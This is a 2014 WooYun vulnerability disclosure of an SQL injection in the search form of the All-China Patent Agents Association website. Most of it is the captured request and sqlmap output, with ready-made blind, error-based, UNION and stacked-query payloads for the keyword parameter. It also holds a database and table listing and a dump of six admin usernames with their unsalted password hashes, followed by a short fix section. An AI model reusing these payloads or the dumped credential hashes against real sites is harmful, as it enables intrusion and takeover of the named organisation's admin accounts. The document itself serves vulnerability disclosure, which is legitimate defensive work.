Vulnerability summary
Defect ID: wooyun-2014-058269
Title: SQL injection vulnerability in the All-China Patent Agents Association website
Vendor: All-China Patent Agents Association (中华全国专利代理人协会)
Author: bitcoin
Submitted: 2014-04-24 15:58
Fix deadline: 2014-06-08 15:59
Published: 2014-06-08 15:59
Type: SQL injection
Severity: High
Self-assessed rank: 15
Status: vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-04-24: Vendor contacted; waiting for the vendor to acknowledge the report, details not public
2014-06-08: Vendor has actively ignored the vulnerability; details made public
Brief description:
SQL injection vulnerability in the All-China Patent Agents Association website
Details:
Injection point:
The search box on the home page, http://www.acpaa.cn/.
Request captured with Burp:
POST /search.asp HTTP/1.1
Host: www.acpaa.cn
Proxy-Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.acpaa.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.acpaa.cn/index.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSCBQCBB=LIJAJBBAKOICDBKGEEECPFBA
keyword=11&imageField.x=22&imageField.y=12
The keyword parameter is not filtered properly, which leads to SQL injection. Bring out sqlmap:
Place: POST
Parameter: keyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=11%' AND 9752=9752 AND '%'='&imageField.x=22&imageField.y=12
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: keyword=11%' AND 6045=CONVERT(INT,(SELECT CHAR(113)+CHAR(97)+CHAR(105)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (6045=6045) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(111)+CHAR(106)+CHAR(121)+CHAR(113))) AND '%'='&imageField.x=22&imageField.y=12
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: keyword=-7378%' UNION ALL SELECT NULL,CHAR(113)+CHAR(97)+CHAR(105)+CHAR(100)+CHAR(113)+CHAR(70)+CHAR(72)+CHAR(81)+CHAR(71)+CHAR(98)+CHAR(119)+CHAR(88)+CHAR(76)+CHAR(87)+CHAR(122)+CHAR(113)+CHAR(111)+CHAR(106)+CHAR(121)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imageField.x=22&imageField.y=12
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=11%'; WAITFOR DELAY '0:0:5'--&imageField.x=22&imageField.y=12
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] acpaanew
[*] agents_Association
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Database: msdb
[82 tables]
+-----------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+-----------------------------+
Database: acpaanew
[35 tables]
+----------------+
| Adv |
| CG_Admin |
| CG_Config |
| News1 |
| News2 |
| News3 |
| News_cat1 |
| News_cat2 |
| agency_grade |
| agency_grade |
| agent_batch |
| agent_batch |
| agent_grade |
| agent_grant |
| apply_grade |
| apply_grade |
| area |
| course |
| dtproperties |
| essay |
| lawsuit |
| member |
| note |
| pay |
| project |
| record |
| register_error |
| register_error |
| sysconstraints |
| syssegments |
| tally |
| train_apply |
| train_apply |
| train_b |
| ymq_v_Channel |
+----------------+
Database: acpaanew
Table: CG_Admin
[7 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| admin | nvarchar |
| flag | ntext |
| ID | int |
| isadmin | int |
| lastlogin | datetime |
| rank | int |
| userpassword | nvarchar |
+--------------+----------+
Database: acpaanew
Table: CG_Admin
[6 entries]
+-------+----------------------------------+
| admin | userpassword |
+-------+----------------------------------+
| acpaa | 993E00ECB3FCE3C4F87C2F560375CA78 |
| cw | 827CCB0EEA8A706C4C34A16891F84E7B |
| dwjl | C4F9F48F8526F3F0680B3C26C4DE79EE |
| hy | 96E79218965EB72C92A549DD5A330112 |
| px | 379EF4BD50C30E261CCFB18DFC626D9F |
| xx | A926D4A5F5FF3F419907C92BC9523A91 |
+-------+----------------------------------+
Proof of vulnerability:
As above.
Fix:
Filter the keyword parameter, and more importantly stop building the query by string concatenation: every payload above works only because the search term is spliced straight into a LIKE '%...%' literal. Pass it as a bound parameter (an ADODB.Command with a parameter object in classic ASP), escape LIKE wildcards in the value, and run the site under a database login that has only the rights the search page needs. Separately, the userpassword values dumped above are 32-character hex digests with no salt column beside them; replace them with a salted, slow password hash and rotate the admin passwords.
Copyright notice: when reposting, credit the source as bitcoin@WooYun
Vulnerability response
Vendor response:
Vendor could not be reached, or vendor actively refused the report